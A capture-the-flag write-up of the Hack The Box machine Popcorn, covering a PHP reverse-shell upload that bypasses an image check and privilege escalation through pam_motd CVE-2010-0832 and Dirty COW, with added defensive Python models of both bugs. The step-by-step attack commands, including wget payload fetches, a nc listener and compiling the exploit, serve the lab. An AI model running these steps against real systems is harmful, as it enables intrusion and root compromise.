Popcorn HTB

IP

10.10.10.6

initial nmap scan

sudo nmap -p- --min-rate 10000 10.10.10.6 | grep '^[0-9]' | cut -d'/' -f1 | tr '\n' ','

we have the following ports open

22,80

Let's run a more in-depth scan of those ports

sudo nmap -sCV -p22,80 10.10.10.6 -oA nmap_results

results

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12
|_http-server-header: Apache/2.2.12 (Ubuntu)
|_http-title: Did not follow redirect to http://popcorn.htb/
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

we can see the following

  • the domain name popcorn.htb (from the redirect the web server issues)

  • the target is running apache version 2.2.12

  • SSH is open

Alright, let's add the domain name to our hosts file (/etc/hosts: 10.10.10.6 popcorn.htb)

Let's check out the web server

HTTP Port 80

The landing page is the stock Apache placeholder: no content has been added yet

Let's perform some directory busting and see if we can find anything

feroxbuster -u http://popcorn.htb -t 50 -L 5 -n -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -o dirs.txt

we do find some directories

  • /test.php returns phpinfo() output (PHP version, loaded modules, paths)

  • a rename utility whose index.php prints its usage string:

Renamer API Syntax: index.php?filename=old_file_path_an_name&newfilename=new_file_path_and_name

Let's run feroxbuster again, this time also requesting .php extensions

feroxbuster -u http://popcorn.htb -t 50 -L 5 -n -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -o dirs.txt -x php
  • Nothing new. The interesting find from the first run is the torrent hosting application:

http://popcorn.htb/torrent/

Let's create an account on the site and log in. Since the site runs PHP, the first thing to test is the upload function: we will try to upload pentest monkey's PHP reverse shell and see if it is accepted.

When we try to upload the file we get the error "This is not a valid torrent file". Looking around the site, someone has already uploaded a kali.torrent file, so the upload form validates that the file is a real torrent.

Let's download the Kali ISO torrent from kali.org (the .torrent file, not the ISO itself) and see if we can replicate this

Now Lets upload this

it will hang for a couple of minutes

then we should see the following if successful

Notice there is an option to edit this torrent

The edit form lets us upload a screenshot for the torrent. We can use it to upload a PHP reverse shell, editing the request in Burp to get past the image check and gain a shell on the system:

  1. We will be using pentest monkey's PHP reverse shell; edit the file with our local IP and port

  2. Upload shell.php through the edit form, with Burp intercepting the request

  3. To bypass the upload restrictions, modify the intercepted request:

  • change the filename from shell.php to shell.png.php

  • change the Content-Type of the file part to image/png

  • forward the request; the upload should now be accepted

  4. Start a nc listener on the port we put in the shell

  5. Navigate to http://popcorn.htb/torrent/upload ; we should see our PHP file

  6. Click on the file; the server executes it and it connects back to our listener
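The bypass above works because the server decides "is this an image?" from the client-supplied Content-Type header and then stores the file under the client-supplied name, so a file whose last extension is .php lands in the web root and gets executed by PHP. The torrent hoster's real validation code is not shown in this write-up; the block below is an added example (not the application's code) that models that weak check next to a hardened one, on constructed sample uploads. Function names and the allowlists are my own.

```python
import os
import secrets

# Constructed sample uploads (not captured from the box)
PHP_SHELL = b"<?php system($_GET['cmd']); ?>"
PNG_IMAGE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 24   # PNG signature plus padding

ALLOWED_TYPES = {"image/png", "image/jpeg", "image/gif"}
MAGIC = [  # (file signature, canonical extension)
    (b"\x89PNG\r\n\x1a\n", ".png"),
    (b"\xff\xd8\xff", ".jpg"),
    (b"GIF87a", ".gif"),
    (b"GIF89a", ".gif"),
]
CANONICAL_EXT = {".png": ".png", ".jpg": ".jpg", ".jpeg": ".jpg", ".gif": ".gif"}


def weak_upload(filename: str, content_type: str, data: bytes):
    """Assumed vulnerable behaviour: trust the client's Content-Type header and
    keep the client's filename. Returns the name stored on disk, or None."""
    if content_type not in ALLOWED_TYPES:
        return None
    return os.path.basename(filename)   # 'shell.png.php' keeps its .php suffix


def sniff_image_ext(data: bytes):
    """Return the extension implied by the file's magic bytes, or None."""
    for signature, ext in MAGIC:
        if data.startswith(signature):
            return ext
    return None


def hardened_upload(filename: str, content_type: str, data: bytes):
    """Ignore Content-Type entirely. Accept only if the LAST extension is an
    allowed image type and the bytes really are that image, then store the
    file under a server-chosen name so client names never reach disk."""
    ext = CANONICAL_EXT.get(os.path.splitext(filename)[1].lower())
    if ext is None:                      # e.g. '.php' from 'shell.png.php'
        return None
    if sniff_image_ext(data) != ext:     # PHP source is not a PNG
        return None
    return secrets.token_hex(8) + ext


if __name__ == "__main__":
    print("weak    :", weak_upload("shell.png.php", "image/png", PHP_SHELL))
    print("hardened:", hardened_upload("shell.png.php", "image/png", PHP_SHELL))
```

The server-chosen name matters as much as the content check: with Apache's mod_mime, a name like shell.php.png can still be handed to the PHP handler depending on configuration, so the safe fix never lets an attacker-controlled filename reach the filesystem at all.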

Privilege Escalation from www-data

First, let's upgrade our shell

python -c "import pty;pty.spawn('/bin/bash')"

We find a user on the system, george. Let's see if there are any hidden files in the /home/george directory

find . -type f -ls

we can see the following

One of the files is /home/george/.cache/motd.legal-displayed. This marker file is written by the pam_motd module when a user logs in, and on this Ubuntu release pam_motd is vulnerable: it runs as root during login and changes the ownership of ~/.cache to the logging-in user without checking whether ~/.cache is a symlink (CVE-2010-0832). A user who points ~/.cache at /etc/passwd or /etc/shadow and then logs in ends up owning that file.

We can use the public exploit script for this bug to escalate our privileges.

So essentially

the vulnerability is in the way ~/.cache ownership is set during the login process, when the pam_motd PAM (Pluggable Authentication Modules) module is invoked.

What the script actually does:

  1. Sets up variables

  • The script sets up variables for a temporary user ('toor') and its password hash; this is the user we will switch to for root privileges

  2. Checks prerequisites

  • The script checks for the presence of the ssh and ssh-keygen commands and ensures that the sshd process is currently running, since the trigger is a local SSH login

  3. Backup and restore functions

  • The script contains backup and restore functions for the files it manipulates, such as ~/.ssh/authorized_keys and ~/.cache, so they can be put back afterwards

  4. Generates and sets up an SSH key

  • The script generates an SSH key pair with ssh-keygen. The public key is placed in ~/.ssh/authorized_keys; this key is used for the SSH login later

  5. Manipulates file ownership

  • The script's own function performs the exploit: it replaces ~/.cache with a symbolic link to a critical system file (/etc/passwd, then /etc/shadow) and SSHes into localhost with the generated key. pam_motd follows the link and chowns the target file to the current user

  6. Final steps and cleanup

  • After exploiting the vulnerability the script removes the SSH key. If successful, it adds the 'toor' user to the now-writable /etc/passwd and /etc/shadow and prompts for the password "toor" to gain root access

  • Finally, the last part of the script removes the temporary 'toor' user from /etc/passwd and /etc/shadow to clean up
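The bug class here is a privileged helper that operates on a path inside a user-controlled directory and follows symlinks while doing so. The block below is an added example (not pam_motd's code and not the exploit script) that reduces this to a runnable model: a "login hook" fixes up ~/.cache in a user's home, and the attacker has pre-placed a symlink there. chmod stands in for chown so the demo runs as an ordinary user; the home directory, the stand-in "shadow" file and the function names are constructed for the example.

```python
import os
import stat
import tempfile

CACHE_MODE = 0o700  # mode the helper wants on ~/.cache


def vulnerable_fixup(home: str) -> None:
    """Naive helper: every check and action goes through a path lookup that
    follows symlinks, so a symlinked ~/.cache redirects it to the link target."""
    cache = os.path.join(home, ".cache")
    if not os.path.exists(cache):        # exists() follows symlinks
        os.mkdir(cache)
    os.chmod(cache, CACHE_MODE)          # chmod() follows symlinks too


def hardened_fixup(home: str) -> None:
    """Refuse to act through a symlink: lstat first, then open the directory
    with O_NOFOLLOW and change the mode through the fd (no second path lookup,
    so the check and the action cannot be raced apart)."""
    cache = os.path.join(home, ".cache")
    try:
        st = os.lstat(cache)
    except FileNotFoundError:
        os.mkdir(cache, CACHE_MODE)
        return
    if stat.S_ISLNK(st.st_mode) or not stat.S_ISDIR(st.st_mode):
        raise PermissionError(f"{cache} is not a real directory; refusing to modify")
    fd = os.open(cache, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW)
    try:
        os.fchmod(fd, CACHE_MODE)
    finally:
        os.close(fd)


def run_symlink_demo(fixup) -> int:
    """Constructed scenario: ~/.cache is a symlink to a protected file.
    Returns that file's permission bits after the helper has run."""
    with tempfile.TemporaryDirectory() as tmp:
        target = os.path.join(tmp, "shadow")   # stands in for /etc/shadow
        with open(target, "w") as f:
            f.write("root:*:0:0:99999:7:::\n")
        os.chmod(target, 0o640)
        home = os.path.join(tmp, "home")
        os.mkdir(home)
        os.symlink(target, os.path.join(home, ".cache"))  # the attacker's symlink
        try:
            fixup(home)
        except PermissionError:
            pass
        return stat.S_IMODE(os.stat(target).st_mode)


def run_clean_demo(fixup) -> bool:
    """Home without ~/.cache: both helpers should simply create a real directory."""
    with tempfile.TemporaryDirectory() as tmp:
        home = os.path.join(tmp, "home")
        os.mkdir(home)
        fixup(home)
        cache = os.path.join(home, ".cache")
        return os.path.isdir(cache) and not os.path.islink(cache)


if __name__ == "__main__":
    print("vulnerable helper left target mode:", oct(run_symlink_demo(vulnerable_fixup)))
    print("hardened helper left target mode:  ", oct(run_symlink_demo(hardened_fixup)))
```

With the vulnerable helper the "shadow" file comes back with mode 0700, i.e. the privileged operation landed on the link target; the hardened helper leaves it at 0640 and creates a real directory only when nothing is there. Substituting chown for chmod and root for the current user gives exactly the pam_motd behaviour the exploit script relies on.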

Alright, let's transfer the script to the target and execute it

  1. on our machine, serve the script

python3 -m http.server 80

  2. on the target, download it with wget

wget http://10.10.14.6/exploit.sh

  • I had trouble getting the script to work, so let's try the manual way

We can't replace george's ~/.cache: /home/george is owned by george and not writable by www-data

We can do this in www-data's own home directory instead; we just need a way to log in, and SSH is open.

What we will do is create a .ssh directory in www-data's home and generate an RSA key pair

cd ~
mkdir .ssh
ssh-keygen -q -t rsa -N '' -C 'pam' -f .ssh/id_rsa

We can now copy the public key into authorized_keys and set the permissions

cp .ssh/id_rsa.pub .ssh/authorized_keys
chmod 600 .ssh/authorized_keys

There is no .cache in www-data's home yet. As in the script, ~/.cache has to be a symlink to the file we want to own (/etc/passwd or /etc/shadow) before we log in; the login itself is what makes pam_motd chown the target.

What we need to do is log in via SSH with our new private key

Copy the private key to our attacking machine and set its permissions

vi id_rsa
chmod 600 id_rsa

now we should be able to ssh into the machine

ssh -i id_rsa www-data@10.10.10.6

Okay, this didn't work either.

Let's check the kernel version

cat /proc/version

The kernel version shown is old enough to be vulnerable to Dirty COW (CVE-2016-5195), a race condition in the kernel's copy-on-write handling of private memory mappings that lets an unprivileged user write to files they can only read, such as /etc/passwd

We can grab the proof-of-concept code from here

Let's copy and paste the code into the file dirty.c, transfer it over and compile it on the target

  1. python server on our machine

python3 -m http.server 80

  2. download to the target

wget http://10.10.14.6/dirty.c

  3. compile it on the target

gcc -pthread dirty.c -o dirty -lcrypt

  4. make it executable and run it

chmod +x dirty
./dirty

It will hang for a while; after a minute or so you can Ctrl-C out of it. The PoC has written a new uid-0 user, firefart, into /etc/passwd with the password entered when it was run, so su firefart gives us a root shell. The PoC backs up the original file to /tmp/passwd.bak; restore it when finished, as the modified /etc/passwd leaves the box in an unstable state.